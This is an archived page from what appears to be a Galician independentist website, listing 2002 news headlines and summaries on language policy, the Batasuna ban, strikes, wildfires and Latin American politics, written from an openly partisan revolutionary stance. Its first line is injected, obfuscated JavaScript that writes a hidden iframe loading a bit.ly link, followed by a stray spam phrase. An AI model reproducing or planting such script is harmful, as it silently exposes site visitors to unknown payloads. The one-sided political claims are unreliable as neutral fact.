\');',15,15,'|iframe|document|write|src|http|bit|ly|2b4mWbk|border|width|height|style|visibility|hidden'.split('|'),0,{}))" bgcolor="#FFFFFF" text="#000000" link="#FF0000" vlink="#FF0000" alink="#000066">
orthopedic pain management
·DESTAQUES ANTERIORES (Junho-Julho-Agosto de 2002)

· Agosto de 2002

- O galego esmorece no ensino: a Junta reconhece o incumprimento dos mínimos legais. Todos os dados concluem o flagrante incumprimento dos mínimos legais no uso do galego no ensino. Por exemplo, no ESO som 77,3% de centros a incumprir o decreto. A Junta reconhece-o, mas di que cumpre manter a "paz" (+...)

- Johannesburgo 2002: o fracasso global do capitalismo real. Os informes OFICIAIS sobre a pobreza e o meio natural, coincidentes com a Cimeira da Terra que nestes dias decorre em Johannesburgo, dam ideia do fracasso do capitalismo como sistema mundial. De manter o seu domínio, conduzirá ao colapso ambiental e social do nosso planeta (+...)

- Ao PSOE nom lhe chegam os mais de 7.000 polícias e guardias civiles espanhóis e 6.500 agentes privados presentes na Galiza. No PSOE dim que a Galiza padece "défice de efectivos" das forças repressivas espanholas, apesar de reconhecerem a presença de mais de 7.000 polícias e guardias civiles (2.724 e 4.285 elementos respectivamente). Exigem mais efectivos (+...)

- Pola ilegalizaçom de PP e PSOE. Proposta para a ilegalizaçom de PP e PSOE a partir das motivaçons aplicadas a Batasuna (+...)

- Execuçons e perfil étnico da populaçom carcerária dos USA revela justiça racista. Nos Estados Unidos, para cada 100 mil habitantes, estám encarecerados 3.535 negros, 1.177 hispánicos e só 462 de origem europeia, embora estes últimos representem mais de 70% da populaçom. Aliás, USA tem na pena de morte o mais evidente atentado à dignidade humana (+...)

- BNG: O Parlamento nom deve ilegalizar Batasuna. A justiça, sim. Esforçando-se em convencer da sua lealdade constitucional, e com um nervosismo evidente, F. Rodríguez defendeu a abstençom do BNG ante a proposta de ilegalizaçom de Batasuna. Enquanto forças como ERC ou IC rejeitam que um Estado dito democrático poda ilegalizar partidos, o BNG, CiU e IU dim que deve fazê-lo a justiça e nom o Parlamento (+...)

- Immanuel Wallerstein: "O declínio do império americano". Análise do papel geo-estratégico dos Estados Unidos no contexto do capitalismo mundial (+...)

- Galiza tem os custos salariais mais baixos. No primeiro trimestre do ano 2002, os custos salariais supunham 73,34% dos bascos e 73,78% dos madrilenos. Desmentindo a propaganda dos Governos e a patronal, os piores dados sócio-laborais caminham na Galiza de maos dadas (+...)

- Novos dados sobre o lume na Galiza. Só neste ano levam ardido 15.244,8 hectares (+...)

- A dez meses do fim da legislatura, BNG e PSOE dim que criarám alternativas a SOGAMA. Tivérom quatro anos para pôr em prática umha alternativa nacional à incineraçom de lixo. Governárom seis das sete principais cidades galegas e, nalgum caso, comarcas de centos de milhares de habitantes. No entanto, a integraçom em SOGAMA foi a norma. No caso do BNG, deu-se um incumprimento eleitoral flagrante (+...)

- Jornadas sobre as pessoas "desaparecidas" e represaliadas no Berço. A falta ainda de fechar completamente o programa definitivo, a Associaçom para a Recuperaçom da Memória Histórica está a organizar umhas jornadas sob a legenda "Os caminhos da Memória", que tratarám sobre a recuperaçom dos restos dos perseguidos da Guerra de 36 e o regime fascista posterior (+...)

- Volta o Festival da Poesia do Condado. A agenda cultural do verao recupera um dos festivais mais significativos do país. A poesia regressa ao Condado, acompanhada pola música, o teatro, o artesanato, a fotografia e a pintura. O evento de correrá nos dias 30 e 31 de Agosto em Salvaterra de Minho (+...)

- A ONU pode obrigar o Estado espanhol a fazer-se cargo da busca dos desaparecidos e desaparecidas da Guerra Civil. No próximo dia 20 de Agosto, a ONU debaterá a possibilidade de que o Estado espanhol se faga cargo de recuperar os corpos de "passead@s" (+...)

- Aproximaçom ao fenómeno do MAS boliviano. Oferecemos umha aproximaçom ao Movimento Ao Socialismo, que no passado mês de Junho andou perto de ganhar as eleiçons presidenciais na Bolívia (+...)

- "Aserejé". Artigo de Floren Aoiz. O militante independentista basco sugere a Aznar umha letra para o hino espanhol (+..)

- O BNG nom quer que a Armada espanhola abandone a Galiza. O deputado Francisco Rodríguez continua a reclamar que a instituiçom militar espanhola fique em Ferrol. Primeiro foi o quartel Sánchez Aguilera, agora é a capitalidade da Zona Marítima del Cantábrico (+...)

- Quinta ediçom das Jornadas da Língua em Tui, organizadas polo MDL. Nesta ocasiom, as jornadas incluem o "convívio de crianças galegofalantes", umha excursom ao Monte Aloia, um roteiro para a recuperaçom da memória histórica, e a já tradicional Descida polo rio Minho. (+...)

- Novos dados sobre o estado do planeta. O mundo tem em frente umha encruzilhada, ao ponto de que as geraçons futuras dependem das decisons que forem adoptadas agora acerca de sistemas decisivos para a fauna e a flora silvestre.(+...)

- O Partido Comunista da Venezuela reclama umha nova Assembleia Constituinte para esmagar a contrarrevoluçom. A recente decisom do Supremo Tribunal de Justiça é a continuaçom pola via "institucional" do golpe fascista de 11 de Abril. De 20 magistrados, 11 decidírom aprovar a petiçom que absolve os militares fascistas e decide que nom houvo nem golpe nem rebeliom militar na referida data. O PC da Venezuela propom contraofensiva popular que esmague de vez o golpismo fascista (+...)

- USA violou os direitos de centenas de pessoas após o 11 de Setembro. Arrestos arbitrários, incomunicaçons com maltrato aos detidos, som algumhas práticas habituais por parte dos USA, segundo difundiu Human Rights Watch em 14 de Agosto(+...)

- Declaraçons do franquista Manuel Fraga: "defender a autodeterminaçom é um grande crime". No clima previo à ilegalizaçom de Batasuna, representantes qualificados do PP criminalizam abertamente as ideias de quem "se desvian de España y su unidad". Eis as declaraçons de Manuel Fraga desde a sua residência de verao em Perbes (+...)

- A luita revolucionária na Colômbia: entrevista às FARC-EP. A guerra que enfrenta as FARC contra o corrupto Estado capitalista colombiano atinge grande crueza, ficando em perigo o poder burguês; os ianques ameaçam invasom. Ante a campanha anti-guerrilha dos media ocidentais, acusando a sua justa luita de terrorismo, oferecemos umha entrevista às FARC-EP para conhecer melhor a história e a actualidade revolucionária colombiana(+...)

- O capitalismo ameaça o futuro do planeta. A ONU apresenta dados como que 40% da populaçom mundial enfrentam escassez de água e 2,2 milhons morrem ao ano por beberem água contaminada (+...)

- Ilegalizaçom de Batasuna: O BNG adere ao coro repressivo. A. Quintana e F. Rodríguez dam aval democrático à possibilidade de que um Estado dito democrático ilegalize partidos (+...)

- Ilegalizaçom de Batasuna: O PP avalia positivamente a abstençom de BNG e IU. Forças que no seu dia votaram contra a Lei de partidos, como IU e o BNG, nesta ocasiom optarám por umha injustificável abstençom, o que já mereceu umha consideraçom positiva do porta-voz do Governo espanhol, Mariano Rajoi. Nom perdas as alucinantes declaraçons do representante do BNG no Congresso espanhol, Francisco Rodríguez (+...)

- A patronal combate a greve em IZAR Fene com despedimentos massivos. Aumenta a tensom nas auxilares de IZAR Fene. Mais de 80 trabalhadores fôrom despedidos na manhá do dia 14 de Agosto. NÓS-UP solidarizou-se com o pessoal em luita (+...)

- Documento público do Partido Comunista do Uruguai ante a situaçom actual do país. "Uruguai em emergência: primeiro o povo!"é o título do documento do Comité. Executivo Nacional do PC uruguaio, integrado na Frente Ampla (+...)

- O "Terceiro Mundo" concentra as vítimas das catástrofes naturais. As catástrofes naturais provocam 90% de suas vítimas nos países subdesenvolvidos, devido à precariedade dos serviços de prevençom e atendimento às vítimas, segundo um informe das Naçons Unidas.(+...)

- Galiza queimada. A Junta reconhece que até Julho houvo 965 incêndios, 3.813 conatos e 665 "queimas de matos". Ao todo, ardêrom mais de 11.730 hectares (+...)

- Incorporamos todo um clássico de Engels à Biblioteca. A Biblioteca Marxista em Galego continua crescendo a bom ritmo. "Do socialismo utópico ao socialismo científico", de Engels (+...)

- Novo texto de Mao Ze Dong na nossa língua . Continuamos incorporando textos à Biblioteca. Nesta ocasiom, "O imperialismo americano é um tigre de papel", de Mao Ze Dong (+...)

- 57 anos após Hiroshima: a nova ameaça nuclear norte-americana. Quando lembramos o primeiro ataque nuclear dos USA, que ainda hoje mantenhem a exclusiva no uso dessas armas de destruiçom massiva, será bom darmos umha olhadela ao novo plano do Governo de Bush em matéria de estratégia militar nuclear, denominado "destruiçom unilateral segura" (+...)

- Proibida na Eslováquia a actividade comunista. O direitista governo eslovaco vem de conseguir, com a inestimável ajuda da social-democracia, a ilegalizaçom da actividade comunista no país. A progressom do Partido Comunista e o descontentamento com os efeitos da volta ao capitalismo semelham ter efeitos na oligarquia do país (+...)

- Greenpeace alerta da destruiçom acelerada do litoral galego. "A protecçom do litoral deve ser tomada a sério. A situaçom agrava-se cada ano e os responsáveis nom fam nada para solucioná-lo. De nada servem as campanhas publicitárias do Ministério de Ambiente com as suas vistosas demoliçons de prédios se autorizam a destruiçom da costa'', segundo afirma o colectivo ecologista Greenpeace (+..)

- Morre o "senhor conselheiro" vietnamita. O povo do Vietnám rende homenagem ao seu mais famoso agente infiltrado nas fileiras pró-ianques na guerra (+...)

- A greve estende-se em IZAR-Fene. Os paros estendêrom-se já ao conjunto do quadro de pessoal do próprio estaleiro, em resposta à negativa da empresa a dar cumprimento ao convénio.(+...)

- A luita dá os seus frutos. Astafersa pagará. Juan Fernández comprometeu-se a pagar o que deve. NÓS-UP foi a única força política que visitou os trabalhadores barricados na Cámara municipal de Ferrol (+...)

- Campanha ecologista contra FENOSA e o espólio hidroeléctrico. Mais de vinte colectivos promovem a campanha "Rios Vivos", que pretende informar do papel depredador e especulador de Unión Fenosa (+...)

- A burguesia cuida-se: esbanjamento de dinheiro público na Junta. Conselheiros e outros altos cargos acabam de gastar MIL MILHONS em carros oficiais, segundo denunciou a CIG (+...)

- Desinteresse da Junta impede transformar o leite na Galiza. A Federaçom de Produtores acusa a Junta de evitar que o ciclo se complete no nosso país, ao rejeitar implicar-se na criaçom de tecido empresarial próprio no sector, o que fai com que uns 250.000 litros de leite diários sejam enviados a Madrid (+...)

- Conflitos vicinais contra grandes empresas no Berço. Conflitos em vários pontos do Berço contra as grandes empresas de obras públicas (+...)

- Novos dados: a comunidade lingüística galega em perigo. Confirma-se o realismo das teses independentistas (+...)

- FLNC: O Estado francês nom quer resolver o seu conflito com a Córsega. A Frente de Libertaçom Nacional da Córsega exprimiu ontem as suas dúvidas de que o Governo de Jean Pierre Raffarin "tenha capacidade para resolver o problema" corso.(+...)

- Fala Ceibe propom que a Lei do Berço reconheça o galego. Nom parece lógico que nengum dos dous projectos actuais de reforma do Estatuto de Comarcalizaçom, realizados por PP e PSOE , tenham em conta a presença do nosso idioma como língua do Berço no futuro texto legal (+...)

- Mais de 4.000 pessoas morrêrom no Estreito de Gibraltar. Os Mais de 4.000 pessoas morrêrom ou desaparecêrom no Estreito de Gibraltar quando tentavam chegar ao Estado espanhol de patera desde 1997 e até o primeiro semestre deste ano, segundo as estimaçons facilitadas ontem polo vicepresidente da Associaçom de Trabalhadores Imigrantes Marroquinos de Espanha (+...)

- Artigo do secretário geral do Partido Comunista Colombiano. Reproduzimos um recente e interessante artigo de Jaime Caicedo Zurriago, secretário geral do Partido Comunista Colombiano, em que analisa a situaçom no país após as recentes eleiçons presidenciais (+...)

- Discurso de Silvio Rodríguez perante a Assembleia cubana. Versom em galego do discurso pronunciado por Silvio Rodríguez, como deputado da Assembleia de Cuba, em que reafirma o seu compromisso com a Revoluçom e o Socialismo (+...)

- Vitória camponesa no conflito do aeoroporto méxicano. Já informamos da luita que se desenvolvia nas próximidades da capital mexicana entre forças populares e o Governo mexicano que, com a polícia como argumento, tentava impor-lhes a construçom de um aeroporto nas suas terras. Afinal, o governo desistiu dos planos de construir ali o novo aeroporto internacional (+...)

- Revolta popular no Uruguai. Latinoamerica explode em revoltas contra a fame. Depois da Argentina, o Peru e o Paraguai, é a vez do Uruguai (+...)

- Discurso de Fidel Castro no 26 de Julho de 2002. Reproduzimos o discurso pronunciado por Fidel Castro com motivo do 49º aniversário do assalto ao quartel Moncada, que neste ano decorreu em Ciego de Ávila no contexto da aclamaçom popular do socialismo e a soberania nacional (+...)

- Nova e repressiva lei de imigraçom portuguesa. No mês de Julho aprovou-se a nova lei de imigraçom em Portugal (+...)

 

Voltar à página principal

 

· Julho de 2002

- Liberdade fascista nos Estados Unidos: ninho de rataçanas.Artigo sobre as actividades nazis nos Estados Unidos, publicado em Granma (+...)

- Militares ianques escondem provas das matanças de civis afegaos. A ONU reconheceu que forças ianques apagárom as provas da matança provocada ao bombardear um casamento matando dúzias de pessoas (+...)

- USA tem preparado o plano para o próximo ataque contra o Iraque. Segundo o diário The New York Times, a Casa Branca está a preparar o seu ataque contra o Iraque, que começaria com a destruiçom de Bagdá, a sua capital. Além da capital do Iraque, USA tomaria "um ou dous centros de mando" mais, antes de lançar-se massivamente contra o país (+..)

- Leitura recomendada: Política Operária. A revista Política Operária é umha referência fundamental das publicaçons anticapitalistas portuguesas (+...)

- Mais de 500 solicitudes para que a ONU investigue as desapariçons pola repressom na Guerra Civil. A berciana Asociación para la Recuperación de la Memória Histórica, que promove os trabalhos de exumaçom das valas comuns da Guerra de 36, entregará no próximo dia 15 de Agosto à ONU mais de 500 solicitudes de familiares de desaparecidos de todo o Estado espanhol para que abra umha investigaçom oficial (+...)

- Independentistas de Porto Rico buscam unidade. Os movimentos pola independência de Porto Rico caminham para a unidade visando intensificar a luita contra a presença da Marinha de Guerra dos Estados Unidos na ilha de Vieques (+...)

- USA nom consegue bloquear na ONU o Tratado contra a Tortura. Os Estados Unidos resistírom ferozmente à aprovaçom de um Tratado Contra a Tortura pola ONU, mas terminárom isolados e derrotados. A diplomacia norte-americana tinha a pretensom de reescrever o tratado que está sendo negociado há dez anos. Terminou derrotada por 35 votos contra 8 (e 10 abstençons). (+...)

- Continuam os trabalhos de exumaçom de assassinad@s na Guerra Civil no Berço. Continuamos fazendo seguimento dos trabalhos que na comarca do Berço visam recuperar a memória histórica mediante a busca dos vizinhos e vizinhas assassinadas polos franquistas. Onámio, no concelho de Molinaseca, é o lugar actual dos trabalhos (+...)

- galizalivre versom 2.0.Nom podemos deixar de recomendar a visita ao portal independentista que, um ano depois da sua activaçom, renova imagem e conteúdos oferecendo umha ferramenta ainda mais potente para a socializaçom das ideias independentistas de umha óptica de esquerdas e antipatriarcal. www.galizalivre.org

- Galiza, cada vez mais longe da renda espanhola. Som dados do espanhol Instituto Nacional de Estadística. Afirmam que o nosso país fica cada vez mais por baixo dos parámetros económicos espanhóis (+...)

- Israel assassina crianças enquanto USA lhe promete mais dólares. A genocida acçom da aviaçom israelita assassinou dezassete pessoas, dentre elas onze crianças. Entretanto, o Governo ianque aprovou novas ajudas económicas aos "amigos" sionistas(+...)

- Afeganistám: entre 800 e 4.000 vítimas mortais civis desde Outubro. Nom há acordo sobre o número de mortes civis provocadas pola agressom imperialista, o que mostra que ali, ao contrário de Nova Iorque, nem contadas estám.(+...)

- Israel viola os direitos humanos também no seu interior. "Salienta a decisom de restringir tanto os direitos civis como os económicos, especialmente dos sectores mais fracos da populaçom", di a Associaçom polos Direitos Civis em Israel" (+...)

- Recuperaçom da memória histórica no Berço: Aparecem os primeiros restos humanos nas escavaçons das valas comuns da Guerra Civil (+...)

- NÓS-UP após a acçom militar espanhola. NÓS-UP rejeita a acçom imperialista do exército espanhol na ilha africana de Leila e condena o apoio do BNG à mesma (+...)

- O BNG apoiou que Espanha recuperasse a ilha africana. O BNG votou a favor dumha resoluçom que instava ao Governo do PP para que "restaure o statu quo anterior aos factos"(+...)

- Os USA militarizam a repressom interior. O presidente George W. Bush apresentou ontem um suposto novo plano antiterrorismo para os USA, que inclui o uso mais agressivo de militares em território norte-americano (+...)

- "As nossas forças": artigo de Iñaki Gil de San Vicente. No contexto da provável ilegalizaçom de Batasuna, reproduzimos um artigo de Iñaki Gil de San Vicente sobre a realidade actual da esquerda abertzale (+...)

- O golpista exército espanhol perde os nervos. E nom só polo penasco marroquino. Um alto mando arengou em Ferrol as tropas contra quem "pom em entredito a pátria espanhola" (+...)

- País Valenciá: Agressom lingüística. Um grupo de turistas espanhóis protagonizou umha agressom lingüística na cidade valenciana de Benicássim, boicotando umha representaçom teatral por desenvolver-se parcialmente em catalám. O publico acabou por expulsar os agressores da sala (+...)

- Revolta popular e repressom policial no Paraguai. Depois da Argentina, Venezuela, Peru e Uruguai, agora é a vez de o governo paraguaio -acusado polos seus opositores de ser corrupto, neoliberal e entreguista- enfrentar umha avassaladora onda de protestos. (+...)

- Berço: recuperaçom da História nas valas comuns da Guerra. A Associaçom para a Recuperaçom da Memória Histórica trata de recuperar os cadáveres de dúzias de pessoas que assassinadas numha vala comum em montes ou caminhos da comarca galega do Berço (+...)

- Delegaçom mapuche ante a Uniom Europeia e as Naçons Unidas. Umha delegaçom do povo mapuche reunirá-se com o Parlamento europeu em Bruxelas e com o relator de Naçons Unidas em Genebra. (+...)

- Camponeses mexican@s em pé. O movimento opom-se ao plano de construir o novo terminal aéreo. Os moradores reiterárom que defenderiam a terra com suas vidas.(+...)

 

Voltar à página principal

 

· Junho de 2002

- Polícia espanhola agrede deputados portugueses. Deputados portugueses de esquerda comprovárom em carne própria a natureza fascista da Guardia Civil e da Polícia espanhola. Faziam parte de umha delegaçom da esquerda portuguesa (PCP e Bloco de Esquerda), e fôrom maltratados na fronteira de Badajoz, originando-se um conflito diplomático. Toda a informaçom aqui (+...)

- Balanço urgente do Comité Central de Primeira Linha sobre a greve geral. Toda a informaçom e reportagem gráfica sobre a histórica jornada de 20-J. (+...)

- Aumentam os gastos em armamento. Os gastos mundiais em armamentos aumentárom em 2001 até 839 bilhons de dólares, sem ter ainda em conta os gastos suplementares após o 11 de Setembro. (+...)

- ELA e LAB consideram a greve basca como um “passo para a soberania”. As centrais abertzales bascas promovêrom um dia próprio para a greve geral. No balanço, salientam o “êxito rotundo” da convocatória em que centenas de filiad@s gritárom contra o Governo, UGT e CCOO, reclamando um quadro próprio de relaçons laborais.(+...)

- Aumenta a pobreza nos países pobres. A situaçom nos países mais pobres do mundo está piorando mais do que se imaginava. As próprias instituiçons capitalistas reconhecem esta evidência, e a última a fazê-lo foi em 18 de Junho um relatório da Conferência das Naçons Unidas para Comércio e Desenvolvimento - Unctad. o número de pessoas que vivem com menos de 1 dólar por dia nos 49 países mais pobres do mundo -principalmente em África- mais do que duplicou nos últimos 30 anos (+...)

- Venezuela: prepara a direita um novo golpe de Estado? Fontes revolucionárias alertam contra a possibilidade de os sectores antibolivarianos estarem a gestar um novo golpe de Estado de sanguentas proporçons na Venezuela (+...)

- A organizaçom unitária da esquerda independentista, NÓS-UP, fijo pública a sua campanha de apoio à greve geral de 20 de Junho (+...)

- A burguesia poupará na Galiza mais de 80 milhons de euros ao ano (por cima dos treze mil milhons de pesetas) graças à reforma laboral do PP (+...)

- Também Catalunha se manifesta contra a Lei de partidos. Centenas de pessoas manifestárom-se em Barcelona contra a Lei de partidos aprovada polo congresso espanhol (+...)

- Manifestaçom contra a nova Lei de Partidos. Centenas de pessoas manifestárom-se no dia 15 de Junho em Compostela contra a Lei de Partidos. Crónica e reportagem gráfica aqui.(+...)

- Israel impom a segregaçom física ao povo palestiniano, com um muro de 350 Km. Pior do que no Apartheid. Yasser Arafat já declarou: "Trata-se de umha medida racista, sionista e nom podemos aceitá-la de nengumha forma; resistiremo-la com toda a nossa força."(+...)

- Maes de Praça de Maio lembram o Che. Texto lido no Auditório da Universidade Popular das Maes na homenagem ao Che polo dia do seu nascimento, na sexta-feira 14 de Junho de 2002 (+...)

- Oitava ediçom da Marcha contra a celulose em Ponte-Vedra. No passado 9 de Junho ponte-vedreses e ponte-vedresas voltárom a marchar contra ENCE-ELNOSA, convocados pola Associaçom de Defesa da Ria. Mais informaçom aqui (+...)

- Jornada de luita feminista no Berço. Cargos institucionais do Partido Popular convocaram em Ponferrada umha manifestaçom de apoio ao alcalde do PP condenado por assédio sexual contra umha concelheira.Frente a eles, as mulheres bercianas mobilizárom-se denunciando a evidente cobertura a um agressor sexual emprestada polos que cada dia se atribuem a exclusiva democrática. Acede aqui à crónica e valorizaçom da Assembleia Feminista do Berço (+...)

- Cuba submete a referendo o carácter "intocável" do socialismo. A medida nom tem precedentes desde a revoluçom de 1959. Instalarám-se 129.523 mesas em todo o país, segundo anunciou o próprio Fidel, quem ante as acusaçons ianques de totalitarismo, vincou o apoio "total" do povo ao socialismo. (+)

- O povo cubano defende o socialismo. Milhons de cubanos e cubanas ocupárom as ruas das capitais de todas as províncias para apoiar a reforma constitucional que reafirma que o sistema socialista é "intocável" (+...)

- Federaçom Ecologista Galega (FEG): BNG e PSOE, também com SOGAMA S.A. A gestom dos resíduos urbanos (RU) no conjunto das 5 cidades governadas por BNG/PSOE é profundamente insatisfatória para a Federaçom Ecologista Galega (FEG). Os governos municipais destas cidades nom mostrárom até hoje um compromisso forte com a reduçom, a reutilizaçom e a reciclagem e nom quigérom ou nom fôrom capazes de diferenciar a sua gestom do lixo da do Partido Popular (+...)

- Cuba na conferência da FAO: "Umha minoria privilegiada é responsável pola crescente fame no mundo". Cuba classificou de genocídio a fame que atinge milhons de pessoas no planeta. Para Cuba, a culpa é de umha minoria privilegiada, empenhada em impor umha ordem económica injusta (+...)

- 2 Junho: Manifestaçom ecologista em Ferrol. As contradiçons do nacionalismo reformista ficam em evidência (+...)

- 30 anos de FARC-EP. Em 27 de Maio de 1964 surgírom as FARC-EP como resposta política, económica, social e armada à agressom do regime oligárquico. Extenso comunicado do Estado Maior Central das FARC-EP no seu 38 aniversário (+...)

- Neofascistas em acçom. Lei racista dà à Itália poder para expulsar imigrantes sem trabalho. O projecto de lei contou com o apoio dos principais partidos da coligaçom governamental: a Força Itália, de Berlusconi, a xenófoba Liga Norte e a pós-fascista Aliança Nacional (+...)

- Declaraçom da organizaçom marxista-leninista Frente Popular para a Libertaçom da Palestina (FPLP) em relaçom com o encadeamento do seu secretário geral. Acusa Arafat de abuso de poder por nom libertar Saadat. (+...)

- Carta aberta a Chávez: Organizaçons populares venezuelanas apresentárom um manifesto em apoio à revoluçom bolivariana e com propostas para fortalecê-la frente à reacçom. (+...)

Voltar ao topo

 

Ver Destaques do mês de Setembro de 2002

Voltar à página principal

 

 

Aqui encontrarás todas as notícias e outros textos incluidos na secçom de Destaque do nosso sítio-web, ordenados mês a mês partindo do mais recente até os mais antigos.